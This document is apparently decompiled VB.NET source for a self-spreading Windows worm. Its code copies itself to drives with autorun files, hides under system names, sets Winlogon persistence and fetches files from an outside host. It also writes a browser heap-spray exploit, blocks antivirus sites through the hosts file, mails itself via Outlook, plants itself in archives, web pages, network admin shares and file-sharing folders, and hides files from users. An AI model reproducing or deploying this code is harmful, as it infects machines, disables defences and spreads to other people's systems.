Public Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs)
Me.objMutex = New Mutex(False, Me.yourmutex)
If Not Me.objMutex.WaitOne(0, False) Then
Me.objMutex.Close
Me.objMutex = Nothing
ProjectData.EndApp
End If
Dim str0 As String = MyProject.Computer.get_FileSystem.get_SpecialDirectories.get_ProgramFiles
Dim textArray1 As String() = Directory.GetLogicalDrives
Dim textArray3 As String() = textArray1
Dim i As Integer
For i = 0 To textArray3.Length - 1
str0 = textArray3(i)
Me.Hide
Try
Directory.CreateDirectory((str0 & "recycler\S-1-5-21-8749679017-0950430147-468708784-3200" & ChrW(65533)))
File.Copy(Application.ExecutablePath, (str0 & "recycler\S-1-5-21-8749679017-0950430147-468708784-3200\recycler.scr" & ChrW(65533)))
Catch exception25 As Exception
ProjectData.SetProjectError(exception25)
ProjectData.ClearProjectError
End Try
Try
Dim info1 As New DirectoryInfo("C:\WINDOWS\system32\dllcache" & ChrW(65533))
info1.Attributes = FileAttributes.Normal
File.Copy(Application.ExecutablePath, "C:\WINDOWS\system32\dllcache\recycled.exe" & ChrW(65533))
File.Copy(Application.ExecutablePath, "C:\WINDOWS\system32\dllcache\myporn.scr" & ChrW(65533))
File.Copy(Application.ExecutablePath, "C:\WINDOWS\system32\dllcache\doc.pif" & ChrW(65533))
File.Copy(Application.ExecutablePath, "C:\windows\system32\drivers\svchost.exe" & ChrW(65533))
info1.Attributes = FileAttributes.Hidden
Catch exception26 As Exception
ProjectData.SetProjectError(exception26)
ProjectData.ClearProjectError
End Try
Try
Dim writer6 As New StreamWriter((str0 & "autorun.inf" & ChrW(65533)))
writer6.WriteLine("[autorun]" & ChrW(65533))
writer6.WriteLine("open=recycler\S-1-5-21-8749679017-0950430147-468708784-3200\recycler.scr" & ChrW(65533))
writer6.WriteLine("shellexecute=recycler\S-1-5-21-8749679017-0950430147-468708784-3200\recycler.scr" & ChrW(65533))
writer6.WriteLine("shell\Explore\command=recycler\S-1-5-21-8749679017-0950430147-468708784-3200\recycler.scr" & ChrW(65533))
writer6.WriteLine("shell\Open\command=recycler\S-1-5-21-8749679017-0950430147-468708784-3200\recycler.scr" & ChrW(65533))
writer6.WriteLine("Shell\open\default=Explore" & ChrW(65533))
writer6.WriteLine("Shell=Explore" & ChrW(65533))
writer6.Close
Catch exception27 As Exception
ProjectData.SetProjectError(exception27)
ProjectData.ClearProjectError
End Try
Try
Dim writer7 As New StreamWriter(New FileStream((str0 & "recycler\S-1-5-21-8749679017-0950430147-468708784-3200\desktop.ini" & ChrW(65533)), FileMode.Create, FileAccess.Write))
writer7.BaseStream.Seek(CLng(0), SeekOrigin.End)
writer7.WriteLine("[.ShellClassInfo]" & ChrW(65533))
writer7.WriteLine("CLSID={645FF040-5081-101B-9F08-00AA002F954E}" & ChrW(65533))
writer7.Close
Catch exception28 As Exception
ProjectData.SetProjectError(exception28)
ProjectData.ClearProjectError
End Try
Try
File.SetAttributes((str0 & "autorun.inf" & ChrW(65533)), FileAttributes.Hidden)
File.SetAttributes((str0 & "recycler\S-1-5-21-8749679017-0950430147-468708784-3200\recycler.scr" & ChrW(65533)), FileAttributes.Hidden)
File.SetAttributes("C:\windows\system32\winlogon.scr" & ChrW(65533), FileAttributes.Hidden)
Catch exception29 As Exception
ProjectData.SetProjectError(exception29)
ProjectData.ClearProjectError
End Try
Try
File.SetAttributes((str0 & "recycler\S-1-5-21-8749679017-0950430147-468708784-3200\desktop.ini" & ChrW(65533)), FileAttributes.Hidden)
New DirectoryInfo((str0 & "recycler" & ChrW(65533))).Attributes = FileAttributes.Hidden
New DirectoryInfo((str0 & "recycler\S-1-5-21-8749679017-0950430147-468708784-3200" & ChrW(65533))).Attributes = FileAttributes.Hidden
Catch exception30 As Exception
ProjectData.SetProjectError(exception30)
ProjectData.ClearProjectError
End Try
Next i
MyProject.Computer.get_Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security" & ChrW(65533), "Level" & ChrW(65533), "0" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security" & ChrW(65533), "Level" & ChrW(65533), "0" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" & ChrW(65533), "UAC" & ChrW(65533), "C:\WINDOWS\system32\dllcache\svchost.exe" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\OLE" & ChrW(65533), "UAC" & ChrW(65533), "C:\windows\system32\drivers\svchost.exe" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" & ChrW(65533), "Shell" & ChrW(65533), "explorer.exe, C:\windows\system32\drivers\svchost.exe" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" & ChrW(65533), "UIHost" & ChrW(65533), "logonui.exe, C:\WINDOWS\system32\dllcache\recycled.exe" & ChrW(65533))
Form1.Sleep(CLng(70000))
Dim writer5 As New StreamWriter(New FileStream("C:\windows\system32\net.vbs" & ChrW(65533), FileMode.Create, FileAccess.Write))
writer5.BaseStream.Seek(CLng(0), SeekOrigin.End)
writer5.WriteLine("strComputer ="".""" & ChrW(65533))
writer5.WriteLine("Set objWMIService = GetObject(""winmgmts:""_ " & ChrW(65533))
writer5.WriteLine("& ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")" & ChrW(65533))
writer5.WriteLine("Set colShares = objWMIService.ExecQuery(""Select * from Win32_Share"")" & ChrW(65533))
writer5.WriteLine("For each objShare in colShares " & ChrW(65533))
writer5.WriteLine("Stuff = objShare.Path " & ChrW(65533))
writer5.WriteLine("Set myFSO = CreateObject(""Scripting.FileSystemObject"") " & ChrW(65533))
writer5.WriteLine("Set WriteStuff = myFSO.OpenTextFile(""C:\windows\system32\logg.txt"", 8, True)" & ChrW(65533))
writer5.WriteLine("WriteStuff.WriteLine(Stuff) " & ChrW(65533))
writer5.WriteLine("WriteStuff.Close " & ChrW(65533))
writer5.WriteLine("SET WriteStuff = NOTHING " & ChrW(65533))
writer5.WriteLine("Next " & ChrW(65533))
writer5.Close
Dim writer1 As New StreamWriter(New FileStream("C:\windows\system32\launch.vbs" & ChrW(65533), FileMode.Create, FileAccess.Write))
writer1.BaseStream.Seek(CLng(0), SeekOrigin.End)
writer1.WriteLine("Dim oShell" & ChrW(65533))
writer1.WriteLine("Set oShell = WScript.CreateObject (""WScript.Shell"")" & ChrW(65533))
writer1.WriteLine("oShell.run ""C:\windows\system32\launch.bat"",0,True" & ChrW(65533))
writer1.WriteLine("Set oShell = Nothing " & ChrW(65533))
writer1.Close
Try
MyProject.Computer.get_Network.DownloadFile("http://pcquad.de/Interop.MessengerAPI.dll" & ChrW(65533), "C:\WINDOWS\system32\drivers\Interop.MessengerAPI.dll" & ChrW(65533))
MyProject.Computer.get_Network.DownloadFile("http://pcquad.de/Interop.MessengerAPI.dll" & ChrW(65533), "C:\WINDOWS\system32\dllcache\Interop.MessengerAPI.dll" & ChrW(65533))
Catch exception31 As Exception
ProjectData.SetProjectError(exception31)
ProjectData.ClearProjectError
End Try
Try
MyProject.Computer.get_Network.DownloadFile("http://pcquad.de/last.txt" & ChrW(65533), "C:\WINDOWS\system32\pptemp.txt" & ChrW(65533))
Catch exception32 As Exception
ProjectData.SetProjectError(exception32)
ProjectData.ClearProjectError
End Try
Dim reader1 As New StreamReader("C:\WINDOWS\system32\pptemp.txt" & ChrW(65533))
Dim text3 As String = reader1.ReadToEnd
reader1.Close
Dim writer3 As New StreamWriter(New FileStream("C:\windows\system32\tmp.dll" & ChrW(65533), FileMode.Create, FileAccess.Write))
writer3.BaseStream.Seek(CLng(0), SeekOrigin.End)
writer3.WriteLine("<script language=""JavaScript"">" & ChrW(65533))
writer3.WriteLine(("var c=""" & ChrW(65533) & Me.link & """);" & ChrW(65533)))
writer3.WriteLine("var array = new Array();" & ChrW(65533))
writer3.WriteLine("var ls = 0x100000-(c.length*2+0x01020);" & ChrW(65533))
writer3.WriteLine("var b = unescape(""%u0C0C%u0C0C"");" & ChrW(65533))
writer3.WriteLine("while(b.length<ls/2) { b+=b;}" & ChrW(65533))
writer3.WriteLine("var lh = b.substring(0,ls/2);" & ChrW(65533))
writer3.WriteLine("delete b;" & ChrW(65533))
writer3.WriteLine("for(i=0; i<0xC0; i++) { " & ChrW(65533))
writer3.WriteLine(ChrW(9) & "array = lh + c;" & ChrW(65533))
writer3.WriteLine("}" & ChrW(65533))
writer3.WriteLine("CollectGarbage();" & ChrW(65533))
writer3.WriteLine("var s1=unescape(""%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"");" & ChrW(65533))
writer3.WriteLine("var a1 = new Array();" & ChrW(65533))
writer3.WriteLine("for(var x=0;x<1000;x++) a1.push(document.createElement(""img""));" & ChrW(65533))
writer3.WriteLine("function ok() {" & ChrW(65533))
writer3.WriteLine(ChrW(9) & "o1=document.createElement(""tbody"");" & ChrW(65533))
writer3.WriteLine(ChrW(9) & "o1.click;" & ChrW(65533))
writer3.WriteLine(ChrW(9) & "var o2 = o1.cloneNode();" & ChrW(65533))
writer3.WriteLine(ChrW(9) & "o1.clearAttributes();" & ChrW(65533))
writer3.WriteLine(ChrW(9) & "o1=null; CollectGarbage();" & ChrW(65533))
writer3.WriteLine(ChrW(9) & "for(var x=0;x<a1.length;x++) a1[x].src=s1;" & ChrW(65533))
writer3.WriteLine(ChrW(9) & "o2.click;" & ChrW(65533))
writer3.WriteLine("}" & ChrW(65533))
writer3.WriteLine("</script><script>window.setTimeout(""ok();"",800);</script>" & ChrW(65533))
writer3.Close
Dim writer4 As New StreamWriter(New FileStream("C:\windows\system32\launch.bat" & ChrW(65533), FileMode.Create, FileAccess.Write))
writer4.BaseStream.Seek(CLng(0), SeekOrigin.End)
writer4.WriteLine("@echo off & break off" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 antivir.de >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.antivir.de >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 symantec.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.symantec.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 fsecure.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.fsecure.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.symantec.com >%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 securityresponse.symantec.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 symantec.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.sophos.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 sophos.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.mcafee.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 mcafee.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 liveupdate.symantecliveupdate.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.viruslist.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 viruslist.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 f-secure.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.f-secure.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 kaspersky.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.avp.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.kaspersky.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 avp.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.networkassociates.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 networkassociates.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.ca.com ca.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 mast.mcafee.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 my-etrust.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.my-etrust.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 download.mcafee.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 dispatch.mcafee.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 secure.nai.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 nai.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.nai.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 update.symantec.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 updates.symantec.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 us.mcafee.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 liveupdate.symantec.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 customer.symantec.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 rads.mcafee.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 trendmicro.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.microsoft.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.trendmicro.com >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 metalhead2005.info >>%windir%\system32\drivers\etc\hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.symantec.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.sophos.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.avast.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.mcafee.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.f-prot.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.f-secure.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.avp.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.kaspersky.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.bitdefender.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.my-etrust.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.eset.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.norman.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo 127.0.0.1 www.grisoft.com>>c:\windows\system32\Drivers\Etc\Hosts" & ChrW(65533))
writer4.WriteLine("echo nzm_bot.exe >%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo msn_plus.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Icq_hack.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo worm_generator.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Command&conquer_Generals.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Worldofwarcraft_crack.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo ea_games-cdkey.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo skype_unlimited.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo 1000_worm_sources.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Windows7_withSerial.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Windows_Vista+Windows_7.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo WindowsVistaultimate.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Vista_ultimate.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo WinXp.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo WinXPpro.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo every_youpornvid.pif >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Warcraft3+expansion.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo bitdefender+crack.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Flyff_PS.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Porn_Jessica_Alba.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Jessica_alba_screensaver.scr >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo win_mediaplayer_11.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Cheatgenerator.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo PhotoshopCS3.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo yourmother.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo irc_bot_source.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo vb.net_ultra_worm.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo VB6_install.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Limewire_pro.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo ICQ_hacker.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo become_hacker.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Hacking.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo How_to_hack.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Youtube_video_converter.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Emule_speedup.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Windows_faster_tutorial.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Rapidshare_account.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo WOW_account.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo callofduty.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo ""how to be an hacker.pif"" >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo callofduty6.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo callofduty5.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo callofduty4.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo callofduty3.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo cod6.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo starcraft.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo starcraft_ghost.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo yugioh.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Conficker_source.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Conficker_removal.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo exploit_pack.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo allexploits.exe >>%windir%\system32\13l.dll" & ChrW(65533))
writer4.WriteLine("echo Const olByValue = 1 >%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo Const olMailItem = 0 >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo Dim oOApp >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo Dim oOMail >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo oOApp = CreateObject(""Outlook.Application"") >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo oOMail = oOApp.CreateItem(olMailItem) >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo With oOMail >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo .To = ""%username%@hotmail.com"" >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo .Subject = ""HEY"" >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo .Body = ""Hello , could you take a look over my picture i have taken some days ago?"" >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo .Attachments.Add ""C:\WINDOWS\system32\dllcache\recycled.exe"", olByValue, 1 >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo .Send() >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("echo End With >>%windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("start %windir%\system32\pbrl.vbs" & ChrW(65533))
writer4.WriteLine("reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"" /v ""HideFileExt"" /t ""REG_DWORD"" /d 1 /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"" /v ""Hidden"" /t ""REG_DWORD"" /d 2 /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""NoFind"" /t ""REG_DWORD"" /d 1 /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""NoFolderOptions"" /t ""REG_DWORD"" /d 1 /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"" /v ""SuperHidden"" /t ""REG_DWORD"" /d 0 /f" & ChrW(65533))
writer4.WriteLine("reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"" /v ""ShowSuperHidden"" /t ""REG_DWORD"" /d 0 /f" & ChrW(65533))
writer4.WriteLine("dir /s /ad /b * >%windir%\teemp.txt" & ChrW(65533))
writer4.WriteLine("start C:\windows\system32\net.vbs" & ChrW(65533))
writer4.WriteLine("ping localhost -n 2" & ChrW(65533))
writer4.WriteLine("for /f %%t in (C:\windows\system32\logg.txt) do (" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %%t\readme.scr " & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine("if exist ""%programfiles%\WINRAR\WinRAR.exe"" (" & ChrW(65533))
writer4.WriteLine("set r = ""%programfiles%\WINRAR\WinRAR.exe""" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe C:\start.exe /f" & ChrW(65533))
writer4.WriteLine("dir /s /ad /b * >%windir%\tmp.log" & ChrW(65533))
writer4.WriteLine("for /f %%l in (%windir%\tmp.log) do (" & ChrW(65533))
writer4.WriteLine("for %%o in (%%l\*.rar) do (" & ChrW(65533))
writer4.WriteLine("%r% a -ibck -y %%o C:\start.exe" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine("for %%k in (%%l\*.zip) do (" & ChrW(65533))
writer4.WriteLine("%r% a -ibck -y %%k C:\start.exe" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine("dir /s /ad /b *shar* >%windir%\temp.dat" & ChrW(65533))
writer4.WriteLine("for /f %%n in (%windir%\temp.dat) do (" & ChrW(65533))
writer4.WriteLine("copy C:\start.exe %%n\windows_7_full.exe /f" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine("For /f %%h in (%windir%\teemp.txt) do (" & ChrW(65533))
writer4.WriteLine(("echo ^<iframe src=""" & ChrW(65533) & Me.link & """ width=0 height=0^>^</iframe^> >>""%%h""\*.htm" & ChrW(65533)))
writer4.WriteLine(("echo ^<iframe src=""" & ChrW(65533) & Me.link & """ width=0 height=0^>^</iframe^> >>""%%h""\*.html" & ChrW(65533)))
writer4.WriteLine(("echo ^<iframe src=""" & ChrW(65533) & Me.link & """ width=0 height=0^>^</iframe^> >>""%%h""\*.php" & ChrW(65533)))
writer4.WriteLine(("echo ^<iframe src=""" & ChrW(65533) & Me.link & """ width=0 height=0^>^</iframe^> >>""%%h""\*.js" & ChrW(65533)))
writer4.WriteLine(("echo ^<iframe src=""" & ChrW(65533) & Me.link & """ width=0 height=0^>^</iframe^> >>""%%h""\*.hta" & ChrW(65533)))
writer4.WriteLine("if exist %windir%\system32\tmp.dll type %windir%\system32\tmp.dll >>%%h\*.html" & ChrW(65533))
writer4.WriteLine("if exist %windir%\system32\tmp.dll type %windir%\system32\tmp.dll >>%%h\*.htm" & ChrW(65533))
writer4.WriteLine(")" & ChrW(65533))
writer4.WriteLine("set /a num=%random%%%20+1" & ChrW(65533))
writer4.WriteLine("ping 192.168.1.%num%" & ChrW(65533))
writer4.WriteLine("ping 192.168.%num%.%num%" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.1.%num%\C$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.%num%.%num%\C$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.1.%num%\IPC$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.%num%.%num%\IPC$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.1.%num%\Admin$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.%num%.%num%\Admin$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.1.%num%\d$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.%num%.%num%\d$\funny.scr" & ChrW(65533))
writer4.WriteLine("set /a bloo=%random%%%255+1" & ChrW(65533))
writer4.WriteLine("ping 192.168.1.%bloo%" & ChrW(65533))
writer4.WriteLine("ping 192.168.%bloo%.%bloo%" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.1.%bloo%\C$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe \\192.168.%num%.%bloo%\C$\funny.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\BearShare\Shared\ea-keygen.exe" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\eDonkey2000\incoming\britney_spears_naked.scr" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\eMule\Incoming\battlefield2-3.exe" & ChrW(65533))
writer4.WriteLine("copy C:\WINDOWS\system32\dllcache\recycled.exe %programfiles%\gnucleus\downloads\incoming\wormgenerator.exe" & ChrW(65533))
